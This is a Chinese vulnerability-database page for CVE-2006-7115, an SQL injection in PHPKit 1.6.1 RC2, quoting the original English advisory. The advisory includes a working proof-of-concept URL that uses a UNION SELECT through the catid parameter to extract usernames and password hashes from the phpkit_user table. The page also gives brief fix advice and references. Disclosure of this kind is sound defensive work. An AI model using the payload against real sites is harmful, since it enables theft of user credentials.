PHPKit 路径参数 SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191437 漏洞类型 SQL注入
发布时间 2007-03-05 更新时间 2007-03-05
CVE编号 CVE-2006-7115 CNNVD-ID CNNVD-200703-169
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/82046
https://cxsecurity.com/issue/WLB-2007030055
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-169
|漏洞详情
PHPKit1.6.1RC2中存在SQL注入漏洞。当路径参数被设置成faq/faq.php时,远程攻击者可以借助catid参数,注入任意的SQL指令。此外,攻击者还可以借助涉及guestbook/print.php的未明向量,注入任意的SQL指令。
|漏洞EXP
+--------------------------------------------------------------------
+
+ PHPKit 1.6.1 RC2
+
+ Original advisory:
+ http://www.bb-pcsecurity.de/
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPKit 1.6.1 RC2
+ Venedor ...........: http://www.phpkit.de/
+ Class .............: Remote SQL Injection
+ Risk ..............: high
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ SQL-INJECTION IN SEVERAL FILES:
+  guestbook/print.php
+  faq/faq.php
+  more (but untested!)
+
+
+--------------------------------------------------------------------
+
+ POC:
+
+--------------------------------------------------------------------
+
+ /include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%20
+ 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20
+ FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1
+
+
+ Solution:
+  -> Install Hack_Block (search google :))
+  -> escape the variables in your SQL-Statement
+
+
+--------------------------------------------------------------------
+
+ Greets and Thanks: /str0ke
+
+-------------------------[ E O F ]----------------------------------
|受影响的产品
PHPKIT PHPKIT 1.6.1 RC2
|参考资料

来源:XF
名称:phpkit-faq-sql-injection(30209)
链接:http://xforce.iss.net/xforce/xfdb/30209
来源:BID
名称:21002
链接:http://www.securityfocus.com/bid/21002
来源:BUGTRAQ
名称:20061110PHPKit1.6.1RC2(faq/faq.php)RemoteSQLInjectionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/451304/100/0/threaded
来源:OSVDB
名称:31265
链接:http://www.osvdb.org/31265
来源:MISC
链接:http://www.bb-pcsecurity.de/websecurity/532/org/PHPKit_1.6.1_RC2_%28faq-faq.php%29_Remote_SQL_Injection_Exploit.htm
来源:SECUNIA
名称:17479
链接:http://secunia.com/advisories/17479
来源:SREASON
名称:2357
链接:http://securityreason.com/securityalert/2357